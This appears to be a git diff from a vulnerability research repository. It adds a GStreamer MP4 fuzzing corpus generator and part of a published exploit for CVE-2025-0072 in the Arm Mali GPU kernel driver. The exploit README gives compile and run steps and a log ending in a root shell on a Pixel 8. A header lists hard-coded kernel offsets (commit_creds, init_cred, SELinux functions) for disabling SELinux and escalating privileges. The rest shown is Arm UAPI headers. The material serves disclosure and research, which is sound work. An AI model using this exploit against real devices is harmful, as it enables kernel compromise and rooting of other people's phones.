"hnti", 0}, + {FOURCC_ilst, "ilst", 0,}, + {FOURCC__nam, "Name", 0,}, + {FOURCC_titl, "Title", 0,}, + {FOURCC__ART, "Artist", 0,}, + {FOURCC_aART, "Album Artist", 0,}, + {FOURCC_auth, "Author", 0,}, + {FOURCC_perf, "Performer", 0,}, + {FOURCC__wrt, "Writer", 0,}, + {FOURCC__grp, "Grouping", 0,}, + {FOURCC__alb, "Album", 0,}, + {FOURCC_albm, "Album", 0,}, + {FOURCC__day, "Date", 0,}, + {FOURCC__cpy, "Copyright", 0,}, + {FOURCC__cmt, "Comment", 0,}, + {FOURCC__des, "Description", 0,}, + {FOURCC_desc, "Description", 0,}, + {FOURCC_dscp, "Description", 0,}, + {FOURCC__lyr, "Lyrics", 0,}, + {FOURCC__req, "Requirement", 0,}, + {FOURCC__enc, "Encoder", 0,}, + {FOURCC_gnre, "Genre", 0,}, + {FOURCC_trkn, "Track Number", 0,}, + {FOURCC_disc, "Disc Number", 0,}, + {FOURCC_disk, "Disc Number", 0,}, + {FOURCC_cprt, "Copyright", 0,}, + {FOURCC_cpil, "Compilation", 0,}, + {FOURCC_pgap, "Gapless", 0,}, + {FOURCC_pcst, "Podcast", 0,}, + {FOURCC_tmpo, "Tempo", 0,}, + {FOURCC_covr, "Cover", 0,}, + {FOURCC_sonm, "Sort Title", 0,}, + {FOURCC_soal, "Sort Album", 0,}, + {FOURCC_soar, "Sort Artist", 0,}, + {FOURCC_soaa, "Sort Album Artist", 0,}, + {FOURCC_soco, "Sort Composer", 0,}, + {FOURCC_sosn, "Sort TV Show", 0,}, + {FOURCC_tvsh, "TV Show", 0,}, + {FOURCC_tven, "TV Episode ID", 0,}, + {FOURCC_tvsn, "TV Season Number", 0,}, + {FOURCC_tves, "TV Episode Number", 0,}, + {FOURCC_keyw, "Keywords", 0,}, + {FOURCC_kywd, "Keywords", 0,}, + {FOURCC__too, "Encoder", 0,}, + {FOURCC__swr, "Application Name", 0,}, + {FOURCC_____, "----", 0,}, + {FOURCC_rmra, "rmra", 0,}, + {FOURCC_rmda, "rmda", 0,}, + {FOURCC__gen, "Custom Genre", 0,}, + {FOURCC_mfra, "movie fragment random access", 0,}, + {FOURCC_moof, "movie fragment", 0,}, + {FOURCC_traf, "track fragment", 0,}, + {FOURCC_mvex, "mvex", 0,}, + {FOURCC_sinf, "protection scheme information", 0}, + {FOURCC_schi, "scheme information", 0}, + + {FOURCC_stsd, "sample description", 16,}, + + {FOURCC_mp4a, "mp4a", 72,}, + {FOURCC_alac, "alac", 72,}, + {FOURCC_fLaC, "fLaC", 72,}, + {FOURCC_aavd, "AAX encrypted audio", 72}, + {FOURCC_opus, "opus", 72,}, + + {FOURCC_mp4v, "mp4v", 86,}, + {FOURCC_avc1, "AV codec configuration v1", 86}, + {FOURCC_avc3, "AV codec configuration v3", 86}, + {FOURCC_hvc1, "HEVC codec configuration", 86}, + {FOURCC_hev1, "HEVC codec configuration", 86}, + {FOURCC_dvh1, "HEVC-based Dolby Vision codec derived from hvc1 ", 86}, + {FOURCC_dvhe, "HEVC-based Dolby Vision codec derived from hev1 ", 86}, + {FOURCC_mjp2, "mjp2", 86,}, + {FOURCC_encv, "encrypted visual sample entry", 86}, + + {FOURCC_meta, "meta", 16,}, + + {FOURCC_mp4s, "VOBSUB codec configuration", 16}, + + {FOURCC_XiTh, "XiTh", 98}, + + {FOURCC_in24, "in24", 52,}, + + {FOURCC_enca, "encrypted audio sample entry", 54} +}; + + +//3rd field = padding (bytes) +const fourcc_info FOURCC_LIST[] = { + + {FOURCC_crgn, "clipping region", 0,}, + {FOURCC_kmat, "compressed matte", 0,}, + {FOURCC_elst, "edit list", 0,}, + {FOURCC_load, "track load settings", 0,}, + {FOURCC___in, "track input", 0,}, /* special container */ + {FOURCC___ty, "input type", 0,}, + {FOURCC_mdhd, "media header", 0,}, + {FOURCC_hdlr, "handler reference", 0,}, + {FOURCC_vmhd, "video media information", 0,}, + {FOURCC_smhd, "sound media information", 0}, + {FOURCC_nmhd, "null media information", 0}, + {FOURCC_gmin, "base media info", 0,}, + {FOURCC_dref, "data reference", 0,}, + + {FOURCC_stts, "time-to-sample", 0,}, + {FOURCC_stps, "partial sync sample", 0,}, + {FOURCC_stss, "sync sample", 0,}, + {FOURCC_stsc, "sample-to-chunk", 0,}, + {FOURCC_stsz, "sample size", 0,}, + {FOURCC_stco, "chunk offset", 0,}, + {FOURCC_co64, "64-bit chunk offset", 0,}, + {FOURCC_vide, "video media", 0}, + {FOURCC_dcom, "compressed data", 0,}, + {FOURCC_cmvd, "compressed movie data", 0,}, + {FOURCC_hint, "hint", 0,}, + + + + {FOURCC_colr, "colr", 0,}, + {FOURCC_pasp, "pasp", 0,}, + {FOURCC_clap, "clap", 0,}, + {FOURCC_tapt, "tapt", 0,}, + {FOURCC_ihdr, "ihdr", 0,}, + {FOURCC_fiel, "fiel", 0,}, + {FOURCC_jp2x, "jp2x", 0,}, + + {FOURCC_dfLa, "dfLa", 0,}, + + {FOURCC_dops, "dOps", 0,}, + {FOURCC_esds, "esds", 0}, + {FOURCC_rtp_, "rtp ", 0,}, + {FOURCC_sdp_, "sdp ", 0,}, + + {FOURCC_data, "data", 0,}, + {FOURCC_free, "free", 0,}, + {FOURCC_skip, "skip", 0,}, + {FOURCC_SVQ3, "SVQ3", 0,}, + {FOURCC_rdrf, "rdrf", 0,}, + {FOURCC_ctts, "Composition time to sample", 0,}, + {FOURCC_cslg, "Composition Shift Least Greatest", 0,}, + + {FOURCC_XdxT, "XdxT", 0}, + {FOURCC_loci, "loci", 0}, + {FOURCC_clsf, "clsf", 0}, + {FOURCC_tfra, "track fragment random access", 0,}, + {FOURCC_mfro, "movie fragment random access offset", 0,}, + {FOURCC_mfhd, "movie fragment header", 0,}, + {FOURCC_tfhd, "track fragment header", 0,}, + {FOURCC_sdtp, "independent and disposable samples", 0,}, + {FOURCC_trun, "track fragment run", 0,}, + {FOURCC_mdat, "moovie data", 0,}, + {FOURCC_trex, "moovie data", 0,}, + {FOURCC_mehd, "movie extends header", 0,}, + {FOURCC_ovc1, "ovc1", 0}, + {FOURCC_owma, "owma", 0}, + {FOURCC_avcC, "AV codec configuration container", 0}, + + {FOURCC_dva1, "AVC-based Dolby Vision derived from avc1", 0}, + {FOURCC_dvav, "AVC-based Dolby Vision derived from avc3", 0}, + {FOURCC_ai12, "AVC-Intra 100M 1080p25/50", 0}, + {FOURCC_ai13, "AVC-Intra 100M 1080p24/30/60", 0}, + {FOURCC_ai15, "AVC-Intra 100M 1080i50", 0}, + {FOURCC_ai16, "AVC-Intra 100M 1080i60", 0}, + {FOURCC_ai1p, "AVC-Intra 100M 720p24/30/60", 0}, + {FOURCC_ai1q, "AVC-Intra 100M 720p25/50", 0}, + {FOURCC_ai52, "AVC-Intra 50M 1080p25/50", 0}, + {FOURCC_ai53, "AVC-Intra 50M 1080p24/30/60", 0}, + {FOURCC_ai55, "AVC-Intra 50M 1080i50", 0}, + {FOURCC_ai56, "AVC-Intra 50M 1080i60", 0}, + {FOURCC_ai5p, "AVC-Intra 50M 720p24/30/60", 0}, + {FOURCC_ai5q, "AVC-Intra 50M 720p25/50", 0}, + + + + {FOURCC_hvcC, "HEVC codec configuration container", 0}, + + + {FOURCC_dvcC, "HEVC-based Dolby Vision codec configuration container", 0}, + {FOURCC_tfdt, "Track fragment decode time", 0,}, + {FOURCC_chap, "Chapter Reference", 0}, + {FOURCC_btrt, "Bitrate information", 0}, + {FOURCC_frma, "Audio codec format", 0}, + {FOURCC_name, "name", 0}, + {FOURCC_mean, "mean", 0}, + {FOURCC_svmi, "Stereoscopic Video Media Information", 0,}, + {FOURCC_scdi, "Stereoscopic Camera and Display Information", 0,}, + {FOURCC_saiz, "sample auxiliary information sizes", 0}, + {FOURCC_saio, "sample auxiliary information offsets", 0}, + + + {FOURCC_enct, "encrypted text sample entry", 0}, + {FOURCC_encs, "encrypted system sample entry", 0}, + {FOURCC_frma, "original format", 0}, + {FOURCC_schm, "scheme type", 0}, + {FOURCC_pssh, "protection system specific header", 0}, + {FOURCC_tenc, "track encryption", 0}, + {FOURCC_sgpd, "sample group description", 0}, + {FOURCC_sbgp, "sample to group", 0}, + {FOURCC_stpp, "XML subtitle sample entry", 0}, + {FOURCC_wvtt, "WebVTT subtitle sample entry", 0}, + {FOURCC_clcp, "Closed Caption", 0}, + {FOURCC_av01, "AV1 Sample Entry", 0}, + {FOURCC_av1C, "AV1 Codec Configuration", 0}, + {FOURCC_av1f, "AV1 Forward Key Frame sample group entry", 0}, + {FOURCC_av1m, "AV1 Multi-Frame sample group entry", 0}, + {FOURCC_av1s, "AV1 S-Frame sample group entry", 0}, + {FOURCC_av1M, "AV1 Metadata sample group entry", 0}, + + {FOURCC_adrm, "AAX DRM key data", 0}, + {FOURCC_mvhd, "movie header", 0,}, + {FOURCC_metx, "XML MetaData Sample Entry", 0}, + {FOURCC_cstb, "Correct Start Time Box", 0}, + {FOURCC_ctab, "color table", 0,}, + {FOURCC_tkhd, "track header", 0,} + }; + +const uint8_t CONTAINER_LIST_SIZE = sizeof(CONTAINER_LIST)/sizeof(CONTAINER_LIST[0]); +const uint8_t FOURCC_LIST_SIZE = sizeof(FOURCC_LIST)/sizeof(FOURCC_LIST[0]); diff --git a/Fuzzing/GStreamer/labeler/labeler.h b/Fuzzing/GStreamer/labeler/labeler.h new file mode 100644 index 0000000..4d3c1e3 --- /dev/null +++ b/Fuzzing/GStreamer/labeler/labeler.h @@ -0,0 +1,11 @@ +#pragma once + +#include + +class Labeler{ + + protected: + + std::string priv_name; + +}; \ No newline at end of file diff --git a/Fuzzing/GStreamer/main.cc b/Fuzzing/GStreamer/main.cc new file mode 100644 index 0000000..ed48046 --- /dev/null +++ b/Fuzzing/GStreamer/main.cc @@ -0,0 +1,114 @@ +#include +#include +#include +#include + +#include +#include + +#include + +#include "tree.h" +#include "aux.h" + + +void print_help(char *argv[]) { + + std::cout << "Usage: " << argv[0] << " -o output_dir" << std::endl; + + std::cout << "\n"; + std::cout << "Options:" << std::endl; + std::cout << "\t -n num_nodes: number of nodes in the tree. Default: 8" << std::endl; + std::cout << "\t -c corpus_size: number of testcases to generate. Default: 10" << std::endl; + + std::cout << std::endl; + std::cout << "\t -o output_dir: output directory" << std::endl; + +} + +int main(int argc, char *argv[]) { + + if(argc < 2){ + print_help(argv); + exit(EXIT_FAILURE); + } + + std::string output_dir = ""; + + uint32_t num_children = 0; + uint32_t max_depth = 0; + + uint32_t num_nodes = 8; + + uint32_t corpus_size = 10; + + int ch; + while ((ch = getopt(argc, argv, "n:c:o:")) != -1) { + + switch (ch) { + + case 'n': { + num_nodes = std::stoi(optarg); + break; + } + + case 'c': { + corpus_size = std::stoi(optarg); + break; + } + + case 'o': { + output_dir = optarg; + break; + } + + default: + print_help(argv); + exit(EXIT_FAILURE); + } + } + + if(output_dir == ""){ + std::cerr << "Output directory not specified" << std::endl; + exit(EXIT_FAILURE); + } + + std::filesystem::path dir = output_dir; + if(!std::filesystem::exists(dir)){ + std::cerr << "Output directory does not exist" << std::endl; + exit(EXIT_FAILURE); + } + + if(num_nodes < 1 || num_nodes > 20){ + std::cerr << "Number of nodes must be between 1 and 20" << std::endl; + exit(EXIT_FAILURE); + } + + std::cout << "Generating " << corpus_size << " testcases with " << num_nodes << " nodes" << std::endl; + + for(int i=0; i < corpus_size; i++){ + + RandomTree tree(num_nodes); + + MP4_labeler labeler(&tree); + + #ifdef DEBUG + std::string dot = tree.dot_format(); + std::cout << dot << std::endl; + #endif + + + std::string file_content = labeler.serialize(); + + std::string output_file = output_dir + "/out_" + std::to_string(i); + + if(!write_to_file(file_content, output_file)){ + std::cerr << "Error writing to file" << std::endl; + exit(EXIT_FAILURE); + } + + } + + +} + diff --git a/Fuzzing/GStreamer/makefile b/Fuzzing/GStreamer/makefile new file mode 100644 index 0000000..4fd2131 --- /dev/null +++ b/Fuzzing/GStreamer/makefile @@ -0,0 +1,9 @@ +CPPFLAGS = -g -O2 + +SRC = tree.cc labeler/MP4.cc +INC = ./ ./labeler + +all: generator + +generator: $(SRC) main.cc + g++ main.cc -I./ -I./labeler $(SRC) $(CPPFLAGS) -o generator diff --git a/Fuzzing/GStreamer/tree.cc b/Fuzzing/GStreamer/tree.cc new file mode 100644 index 0000000..bef9fb0 --- /dev/null +++ b/Fuzzing/GStreamer/tree.cc @@ -0,0 +1,137 @@ +#include +#include +#include +#include + +#include + +#include "tree.h" +#include "aux.h" + + +Node::Node(uint32_t in_id, int32_t in_parent_id, uint32_t in_depth) { + + this->id = in_id; + + this->parent_id = in_parent_id; + + this->depth = in_depth; +} + +const std::vector& Node::children() const{ + + return this->prv_children; +} + +std::string Node::get_label() const{ + + return this->label; +} + +uint32_t Node::get_id() const{ + + return this->id; +} + +void Node::set_label(const std::string &in_label){ + + this->label = in_label; +} + + + + +uint32_t RandomTree::new_node(int32_t parent_id, uint32_t depth){ + + uint32_t new_node_id = this->num_nodes; + + this->nodes.emplace_back(new_node_id, parent_id, depth); + + if(parent_id != -1){ + this->nodes[parent_id].prv_children.emplace_back(new_node_id); + } + + if(this->levels.size() <= depth){ + this->levels.resize(depth+1); + this->tree_depth = depth; + } + + this->levels[depth].emplace_back(new_node_id); + + this->num_nodes++; + + return new_node_id; + +} + + + +RandomTree::RandomTree(uint32_t total_nodes){ + + uint32_t curr_level = 0; + + //Root node + new_node(-1, curr_level); + + curr_level++; + + uint32_t rem_nodes = total_nodes - 1; + + uint32_t current_node = 0; + + while(rem_nodes > 0){ + + uint32_t num_children = rand_uint32(1, rem_nodes); + + uint32_t min_value = this->levels[curr_level-1].front(); + uint32_t max_value = this->levels[curr_level-1].back(); + + for(int i=0; inodes) { + + output << " " << node.id << " [label=\"" << node.label << "\"];\n"; + + if (node.parent_id != -1) { + + output << " " << node.parent_id << " -> " << node.id << ";\n"; + } + + } + + output << "}\n"; + + return output.str(); +} + diff --git a/Fuzzing/GStreamer/tree.h b/Fuzzing/GStreamer/tree.h new file mode 100644 index 0000000..b036f8d --- /dev/null +++ b/Fuzzing/GStreamer/tree.h @@ -0,0 +1,64 @@ +#pragma once + +#include +#include + +#include + +class Node{ + + friend class RandomTree; + + private: + + int32_t id = -1; + int32_t parent_id = -1; + std::vector prv_children = {}; + int32_t depth = -1; + + std::string label; + + + public: + + Node(uint32_t in_id, int32_t in_parent_id, uint32_t in_depth); + + const std::vector& children() const; + + std::string get_label() const; + + uint32_t get_id() const; + + void set_label(const std::string &in_label); + +}; + + +class RandomTree{ + + friend class Labeler; + + private: + + std::vector nodes; + + std::vector> levels; + + uint32_t num_nodes = 0; + + uint32_t tree_depth = 0; + + uint32_t new_node(int32_t parent_id, uint32_t depth); + + public: + + RandomTree(uint32_t total_nodes); + + + Node & get_node(uint32_t node_id); + + size_t size() const; + + std::string dot_format() const; + +}; \ No newline at end of file diff --git a/SecurityExploits/Android/Mali/CVE-2025-0072/README.md b/SecurityExploits/Android/Mali/CVE-2025-0072/README.md new file mode 100644 index 0000000..e0662bd --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE-2025-0072/README.md @@ -0,0 +1,29 @@ +## Exploit for CVE-2025-0072 + +The write up can be found [here](https://github.blog/security/vulnerability-research/bypassing-mte-with-cve-2025-0072). This is a bug in the Arm Mali kernel driver that I reported in December 2024. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root. + +The exploit is tested on the Google Pixel 8 with the November 2024 patch (`AP3A.241105.007`). It needs to be compiled with OpenCL and linked with the OpenCL library `libGLES_mali.so`. The library can be found in a Pixel 8 device in `vendor/lib64/egl/libGLES_mali.so` and the OpenCL header files can be found in the KhronosGroup's [OpenCL-headers repository](https://github.com/KhronosGroup/OpenCL-Headers). The specific header that I used was the [v2023.04.17](https://github.com/KhronosGroup/OpenCL-Headers/releases/tag/v2023.04.17) version, although other versions should also work. For reference, I used the following command to compile with clang in ndk-26: + +``` +android-ndk-r26b/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android34-clang -DSHELL -DCL_TARGET_OPENCL_VERSION=300 -I. -L. mali_userio.c mem_read_write.c mempool_utils.c -lGLES_mali -o mali_userio +``` + +The exploit needs to be linked to `libGLES_mali.so`. This can be done by setting the `LD_LIBRARY_PATH` to `/vendor/lib64/egl`. The exploit rarely fails and even if it does, it does not normally corrupt or crash the system. So in case it fails, it can be rerun. If successful, it should disable SELinux and gain root. + +``` +shiba:/data/local/tmp $ LD_LIBRARY_PATH=/vendor/lib64/egl ./mali_userio +gpu_addr 5ffff94000 +group_handle 1 cookie 30000 +group_handle 1 cookie 30000 +found entry 4000093deaf443 at 384 in page 0 +overwrite addr : 5ffff00c60 c60 +overwrite addr : 5fffb00c60 c60 +overwrite addr : 5ffff00f40 f40 +overwrite addr : 5fffb00f40 f40 +run enforce +result 50 +clean up +shiba:/ # +``` + +To test it with MTE enabled, follow [these instructions](https://outflux.net/blog/archives/2023/10/26/enable-mte-on-pixel-8/) to enable kernel MTE. diff --git a/SecurityExploits/Android/Mali/CVE-2025-0072/firmware_offsets.h b/SecurityExploits/Android/Mali/CVE-2025-0072/firmware_offsets.h new file mode 100644 index 0000000..b15f888 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE-2025-0072/firmware_offsets.h @@ -0,0 +1,16 @@ +#ifndef FIRMWARE_OFFSETS_H +#define FIRMWARE_OFFSETS_H + +#define AVC_DENY_2411 0x839c60 + +#define SEL_READ_ENFORCE_2411 0x84bf40 + +#define INIT_CRED_2411 0x280c948 + +#define COMMIT_CREDS_2411 0x174f38 + +#define ADD_COMMIT_2411 0x913ce108 //add x8, x8, #0xf38 + +#define ADD_INIT_2411 0x91252000 //add x0, x0, #0x948 + +#endif diff --git a/SecurityExploits/Android/Mali/CVE-2025-0072/log_utils.h b/SecurityExploits/Android/Mali/CVE-2025-0072/log_utils.h new file mode 100644 index 0000000..0a4172c --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE-2025-0072/log_utils.h @@ -0,0 +1,11 @@ +#ifndef LOG_UTILS_H +#define LOG_UTILS_H + +#ifdef SHELL +#define LOG(fmt, ...) printf(fmt, ##__VA_ARGS__) +#else +#include +#define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__) +#endif + +#endif diff --git a/SecurityExploits/Android/Mali/CVE-2025-0072/mali_base_common_kernel.h b/SecurityExploits/Android/Mali/CVE-2025-0072/mali_base_common_kernel.h new file mode 100644 index 0000000..23bed51 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE-2025-0072/mali_base_common_kernel.h @@ -0,0 +1,228 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2022 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. + * + */ + +#ifndef _UAPI_BASE_COMMON_KERNEL_H_ +#define _UAPI_BASE_COMMON_KERNEL_H_ + +#include +#include "mali_base_kernel.h" + +#define LOCAL_PAGE_SHIFT 12 + +#define BASE_GPU_NUM_TEXTURE_FEATURES_REGISTERS 4 + +/* Memory allocation, access/hint flags & mask. + * + * See base_mem_alloc_flags. + */ + +/* IN */ +/* Read access CPU side + */ +#define BASE_MEM_PROT_CPU_RD ((base_mem_alloc_flags)1 << 0) + +/* Write access CPU side + */ +#define BASE_MEM_PROT_CPU_WR ((base_mem_alloc_flags)1 << 1) + +/* Read access GPU side + */ +#define BASE_MEM_PROT_GPU_RD ((base_mem_alloc_flags)1 << 2) + +/* Write access GPU side + */ +#define BASE_MEM_PROT_GPU_WR ((base_mem_alloc_flags)1 << 3) + +/* Execute allowed on the GPU side + */ +#define BASE_MEM_PROT_GPU_EX ((base_mem_alloc_flags)1 << 4) + +/* Will be permanently mapped in kernel space. + * Flag is only allowed on allocations originating from kbase. + */ +#define BASEP_MEM_PERMANENT_KERNEL_MAPPING ((base_mem_alloc_flags)1 << 5) + +/* The allocation will completely reside within the same 4GB chunk in the GPU + * virtual space. + * Since this flag is primarily required only for the TLS memory which will + * not be used to contain executable code and also not used for Tiler heap, + * it can't be used along with BASE_MEM_PROT_GPU_EX and TILER_ALIGN_TOP flags. + */ +#define BASE_MEM_GPU_VA_SAME_4GB_PAGE ((base_mem_alloc_flags)1 << 6) + +/* Userspace is not allowed to free this memory. + * Flag is only allowed on allocations originating from kbase. + */ +#define BASEP_MEM_NO_USER_FREE ((base_mem_alloc_flags)1 << 7) + +/* Grow backing store on GPU Page Fault + */ +#define BASE_MEM_GROW_ON_GPF ((base_mem_alloc_flags)1 << 9) + +/* Page coherence Outer shareable, if available + */ +#define BASE_MEM_COHERENT_SYSTEM ((base_mem_alloc_flags)1 << 10) + +/* Page coherence Inner shareable + */ +#define BASE_MEM_COHERENT_LOCAL ((base_mem_alloc_flags)1 << 11) + +/* IN/OUT */ +/* Should be cached on the CPU, returned if actually cached + */ +#define BASE_MEM_CACHED_CPU ((base_mem_alloc_flags)1 << 12) + +/* IN/OUT */ +/* Must have same VA on both the GPU and the CPU + */ +#define BASE_MEM_SAME_VA ((base_mem_alloc_flags)1 << 13) + +/* OUT */ +/* Must call mmap to acquire a GPU address for the allocation + */ +#define BASE_MEM_NEED_MMAP ((base_mem_alloc_flags)1 << 14) + +/* IN */ +/* Page coherence Outer shareable, required. + */ +#define BASE_MEM_COHERENT_SYSTEM_REQUIRED ((base_mem_alloc_flags)1 << 15) + +/* Protected memory + */ +#define BASE_MEM_PROTECTED ((base_mem_alloc_flags)1 << 16) + +/* Not needed physical memory + */ +#define BASE_MEM_DONT_NEED ((base_mem_alloc_flags)1 << 17) + +/* Must use shared CPU/GPU zone (SAME_VA zone) but doesn't require the + * addresses to be the same + */ +#define BASE_MEM_IMPORT_SHARED ((base_mem_alloc_flags)1 << 18) + +/* Should be uncached on the GPU, will work only for GPUs using AARCH64 mmu + * mode. Some components within the GPU might only be able to access memory + * that is GPU cacheable. Refer to the specific GPU implementation for more + * details. The 3 shareability flags will be ignored for GPU uncached memory. + * If used while importing USER_BUFFER type memory, then the import will fail + * if the memory is not aligned to GPU and CPU cache line width. + */ +#define BASE_MEM_UNCACHED_GPU ((base_mem_alloc_flags)1 << 21) + +/* + * Bits [22:25] for group_id (0~15). + * + * base_mem_group_id_set() should be used to pack a memory group ID into a + * base_mem_alloc_flags value instead of accessing the bits directly. + * base_mem_group_id_get() should be used to extract the memory group ID from + * a base_mem_alloc_flags value. + */ +#define BASEP_MEM_GROUP_ID_SHIFT 22 +#define BASE_MEM_GROUP_ID_MASK ((base_mem_alloc_flags)0xF << BASEP_MEM_GROUP_ID_SHIFT) + +/* Must do CPU cache maintenance when imported memory is mapped/unmapped + * on GPU. Currently applicable to dma-buf type only. + */ +#define BASE_MEM_IMPORT_SYNC_ON_MAP_UNMAP ((base_mem_alloc_flags)1 << 26) + +/* OUT */ +/* Kernel side cache sync ops required */ +#define BASE_MEM_KERNEL_SYNC ((base_mem_alloc_flags)1 << 28) + +/* Number of bits used as flags for base memory management + * + * Must be kept in sync with the base_mem_alloc_flags flags + */ +#define BASE_MEM_FLAGS_NR_BITS 30 + +/* A mask for all output bits, excluding IN/OUT bits. + */ +#define BASE_MEM_FLAGS_OUTPUT_MASK BASE_MEM_NEED_MMAP + +/* A mask for all input bits, including IN/OUT bits. + */ +#define BASE_MEM_FLAGS_INPUT_MASK \ + (((1 << BASE_MEM_FLAGS_NR_BITS) - 1) & ~BASE_MEM_FLAGS_OUTPUT_MASK) + +/* Special base mem handles. + */ +#define BASEP_MEM_INVALID_HANDLE (0ul) +#define BASE_MEM_MMU_DUMP_HANDLE (1ul << LOCAL_PAGE_SHIFT) +#define BASE_MEM_TRACE_BUFFER_HANDLE (2ul << LOCAL_PAGE_SHIFT) +#define BASE_MEM_MAP_TRACKING_HANDLE (3ul << LOCAL_PAGE_SHIFT) +#define BASEP_MEM_WRITE_ALLOC_PAGES_HANDLE (4ul << LOCAL_PAGE_SHIFT) +/* reserved handles ..-47< for future special handles */ +#define BASE_MEM_COOKIE_BASE (64ul << LOCAL_PAGE_SHIFT) +#define BASE_MEM_FIRST_FREE_ADDRESS ((BITS_PER_LONG << LOCAL_PAGE_SHIFT) + BASE_MEM_COOKIE_BASE) + +/* Flags to pass to ::base_context_init. + * Flags can be ORed together to enable multiple things. + * + * These share the same space as BASEP_CONTEXT_FLAG_*, and so must + * not collide with them. + */ +typedef __u32 base_context_create_flags; + +/* Flags for base context */ + +/* No flags set */ +#define BASE_CONTEXT_CREATE_FLAG_NONE ((base_context_create_flags)0) + +/* Base context is embedded in a cctx object (flag used for CINSTR + * software counter macros) + */ +#define BASE_CONTEXT_CCTX_EMBEDDED ((base_context_create_flags)1 << 0) + +/* Base context is a 'System Monitor' context for Hardware counters. + * + * One important side effect of this is that job submission is disabled. + */ +#define BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED ((base_context_create_flags)1 << 1) + +/* Bit-shift used to encode a memory group ID in base_context_create_flags + */ +#define BASEP_CONTEXT_MMU_GROUP_ID_SHIFT (3) + +/* Bitmask used to encode a memory group ID in base_context_create_flags + */ +#define BASEP_CONTEXT_MMU_GROUP_ID_MASK \ + ((base_context_create_flags)0xF << BASEP_CONTEXT_MMU_GROUP_ID_SHIFT) + +/* Bitpattern describing the base_context_create_flags that can be + * passed to the kernel + */ +#define BASEP_CONTEXT_CREATE_KERNEL_FLAGS \ + (BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED | BASEP_CONTEXT_MMU_GROUP_ID_MASK) + +/* Flags for base tracepoint + */ + +/* Enable additional tracepoints for latency measurements (TL_ATOM_READY, + * TL_ATOM_DONE, TL_ATOM_PRIO_CHANGE, TL_ATOM_EVENT_POST) + */ +#define BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS (1 << 0) + +/* Indicate that job dumping is enabled. This could affect certain timers + * to account for the performance impact. + */ +#define BASE_TLSTREAM_JOB_DUMPING_ENABLED (1 << 1) + +#endif /* _UAPI_BASE_COMMON_KERNEL_H_ */ diff --git a/SecurityExploits/Android/Mali/CVE-2025-0072/mali_base_csf_kernel.h b/SecurityExploits/Android/Mali/CVE-2025-0072/mali_base_csf_kernel.h new file mode 100644 index 0000000..141b090 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE-2025-0072/mali_base_csf_kernel.h @@ -0,0 +1,608 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2020-2023 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. + * + */ + +#ifndef _UAPI_BASE_CSF_KERNEL_H_ +#define _UAPI_BASE_CSF_KERNEL_H_ + +#include +#include "mali_base_common_kernel.h" + +/* Memory allocation, access/hint flags & mask specific to CSF GPU. + * + * See base_mem_alloc_flags. + */ + +/* Must be FIXED memory. */ +#define BASE_MEM_FIXED ((base_mem_alloc_flags)1 << 8) + +/* CSF event memory + * + * If Outer shareable coherence is not specified or not available, then on + * allocation kbase will automatically use the uncached GPU mapping. + * There is no need for the client to specify BASE_MEM_UNCACHED_GPU + * themselves when allocating memory with the BASE_MEM_CSF_EVENT flag. + * + * This memory requires a permanent mapping + * + * See also kbase_reg_needs_kernel_mapping() + */ +#define BASE_MEM_CSF_EVENT ((base_mem_alloc_flags)1 << 19) + +#define BASE_MEM_RESERVED_BIT_20 ((base_mem_alloc_flags)1 << 20) + + +/* Must be FIXABLE memory: its GPU VA will be determined at a later point, + * at which time it will be at a fixed GPU VA. + */ +#define BASE_MEM_FIXABLE ((base_mem_alloc_flags)1 << 29) + +/* Note that the number of bits used for base_mem_alloc_flags + * must be less than BASE_MEM_FLAGS_NR_BITS !!! + */ + +/* A mask of all the flags which are only valid for allocations within kbase, + * and may not be passed from user space. + */ +#define BASEP_MEM_FLAGS_KERNEL_ONLY \ + (BASEP_MEM_PERMANENT_KERNEL_MAPPING | BASEP_MEM_NO_USER_FREE) + +/* A mask of all currently reserved flags + */ +#define BASE_MEM_FLAGS_RESERVED BASE_MEM_RESERVED_BIT_20 + +/* Special base mem handles specific to CSF. + */ +#define BASEP_MEM_CSF_USER_REG_PAGE_HANDLE (47ul << LOCAL_PAGE_SHIFT) +#define BASEP_MEM_CSF_USER_IO_PAGES_HANDLE (48ul << LOCAL_PAGE_SHIFT) + +#define KBASE_CSF_NUM_USER_IO_PAGES_HANDLE \ + ((BASE_MEM_COOKIE_BASE - BASEP_MEM_CSF_USER_IO_PAGES_HANDLE) >> \ + LOCAL_PAGE_SHIFT) + +/* Valid set of just-in-time memory allocation flags */ +#define BASE_JIT_ALLOC_VALID_FLAGS ((__u8)0) + +/* flags for base context specific to CSF */ + +/* Base context creates a CSF event notification thread. + * + * The creation of a CSF event notification thread is conditional but + * mandatory for the handling of CSF events. + */ +#define BASE_CONTEXT_CSF_EVENT_THREAD 